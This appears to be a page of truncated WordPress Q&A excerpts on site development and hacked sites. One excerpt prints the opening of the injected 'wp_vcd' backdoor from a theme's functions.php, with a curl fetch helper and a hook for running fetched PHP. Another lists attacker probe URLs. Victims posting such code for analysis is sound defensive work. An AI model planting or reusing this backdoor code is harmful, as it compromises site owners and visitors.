I am receiving many requests to my wp-login.php and xmlrpc file, now I just set up an htaccess to prevent requests to xmlrpc, but how do you suggest me to block wp-login? thanks

I am developing a site that uses WooCommerce & WordPress to show a fair amount (10,000+) products, and can't accommodate the size of all the images for the products. So, I'm leaving the images on their CDN, and making all the image attachments references to the external URLs. This required a bit of hacking, as WooCommerce/WordPress will try to take the images and upload them and set the attachment URL to a local relative path (eg, 2018/02/), and then when …

Our code base has a ton of logic that executes as the post is inserted/created. However, some of that logic depends on custom post meta. The only way I know of to add post meta to a new post is like so: $post_id = wp_insert_post($post_obj); add_post_meta($post_id, 'key', "value"); However, this means that the post meta is not present when hooks on post insertion happen. Is there any way to set up or include post meta as part of $post_obj? I …

I would like to inform and request help from the community. What happens is this malware was in the folder / wp-content / uploads / 2020 / Named index.php And I found him in the year 2017 in the uploads folder. What I find strange is that it was not detectable by any online database and not even the Sucuri plugin, Wordfense .. Follow the code (Good part of it was deleted, due to not fit in the post) Below …

On one of a WP installation i troubleshoot (because site is down, too much DB connection) for, there is a ADDED file at the root (with wp-config.php and other) this file is called : db.php It's 280 KB in size and contain some cheezy data, here is a sample Usuage google search dont reveal it's a hack, but does not reveal it's a LEGIT wp file anyway... so the question is, what i do with it... sorry for the "garbage …

My application has >10 user_roles, each able to perform completely different tasks, provided with an custom backend and no access to wp-admin. The extra functionality each user_role gets to use is handled via multiple plugins. Each user_role interacts on the same data (posts, taxonomies etc.) The idea I had is to use a single installation per one or more user_roles connected to a single database to share users, posts etc but with different plugins loaded, so simply a separate wp_options …

I like to hardcode everything on my WordPress websites, without using any plugins. Is there any way to generate or update my sitemap everytime I publish/update a post on one of my Multisite blogs, without using plugins?

I am writing a media plugin that uses custom tables to store its contents. (eg not the post tables where wordpress stores it attachment data). Now i'm looking for a way to use the default wordpress comment system to add comments to it. (These comments will not be in the regular comment table but also a custom table. I need two things: A hook that allows me to intercept the comment submit and process it with my own code if …

I would like to add a download button link for the full-sized image on the prettyPhoto lightbox when a user views a photo on my site. Currently I use the prettyPhoto Media plugin on my site, and I have also used this code (taken from this post) in order to allow prettyPhoto to view a smaller image than the full sized image in galleries so the loading time will be better: function oikos_get_attachment_link_filter( $content, $post_id, $size, $permalink ) { // …

I have the woocommerce plugin and the woocommerce swatches and photos extension that shows swatches instead of variations as a drop down. When hovering over the swatches and when a swatch is selected, I would like to be able to see the name of the color above the color table. enter link description here like the link above please and thank you for your help

There are multiple IPs that are trying to access my directories. I am using iThemes Security plugin and it shows the following lists. These are the files all of the IPs are trying to access every minute. https://www.{My Website Name}.com/tag/feed/ https://www.{My Website Name}.com/premium-titanium/undefined https://www.{My Website Name}.com/wp-content/uploads/2017/11/supra-on-wood.jpg https://www.{My Website Name}.com/product/classic-sports-piece/ http://www.{My Website Name}.com/wp-content/plugins/apikey/wp-surf.php?test=hello There are a total of 2700+ entries and they are increasing minute by minute. Is there any way that I can block any IP that accesses these URLS? …

I have a simple custom widget that asks for its width (that is used later in the front end). The width field is a select dropdown, so a user have predefined options. I will have many instances of my widget, each will have its own width setup. Now, in my widget code I have the following code: echo $before_widget; which results in: <div class="widget my" id="my-widget-1"></div> What I'd like to do is somehow hook into $before_widget and add my own …

This code below was been injected in my wordpress theme on functions.php Can someone explain me what does the code do? how that was been done? $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) …

I am using the third party gadget where they are providing live availability, cost and book now button. When customer click on book now button, it's redirecting to their website which I want to ignore. After doing some google research, I am able to get correct Title & cost under console logs when some is clicking on the book now button. $w.event.subscribe("item.book.click", function(item) { console.log(item); console.log("Title " + item[3].Name + " (Date " + item[4].date + ", Period " + …

Iam trying to activate a plugin which is inside my theme template directory, ie : i have a folder called plugin inside my current theme, which has some plugins how can i activate those plugins from the current plugins options.

I would like to hide the fact that my website runs on Wordpress from potential hackers. Is there a reliable plugin that I can use, or an online guide to doing this, so that a website visitor would have no way to know it is a Wordpress site?

I observe a file being uploaded into various plugin folders in my Wordpress site. The file is used to send out spam from my server and every time I remove it it gets uploaded to another folder. There are hundreds of IP addresses accessing the file, so blocking them may not really prove useful if the attackers have a huge pool of IP addresses. However, I have another two sites that use platforms other than Wordpress and they are not …

Noticed some unwanted files on the website root folder and removed them. I have found that header.php file has some malicious code which redirects to spam sites only on mobile browsers. when these files exists .htaccess pretty permalinks does not work. I have changed Cpanel, FTP passwords.Deleted these below listed unwanted files. Scanned all the files and folders. After a clean installation of wordpress and plugins, these files are added repeatedly. Server: shared hosting / linux server File Transers using …

I have just had to deal with a few of my WordPress websites being hacked. First time put an index.html file in the cpanel of each site and replenished my admin user. Once I felt I cleaned this up, it's happened once again but it changed my title tag to "Hacked by Bala Sniper" and the widgets from the footer of each website were removed. My WHM account isn't WP only websites so I know it can't be a hacker …

My site (4.5.3 on Apache/Linux) was hacked, I suspect something like the one described here. As best I can tell I've removed or at least disabled the hack, however admin users aren't able to perform actions like updating WordPress, adding plugins, etc. So far, I have tried: Editing the existing admin user's permissions via phpMyAdmin. Adding a completely new admin user via phpMyAdmin. Overwriting core WP files with those from a fresh download (of the same version currently installed). Disabled …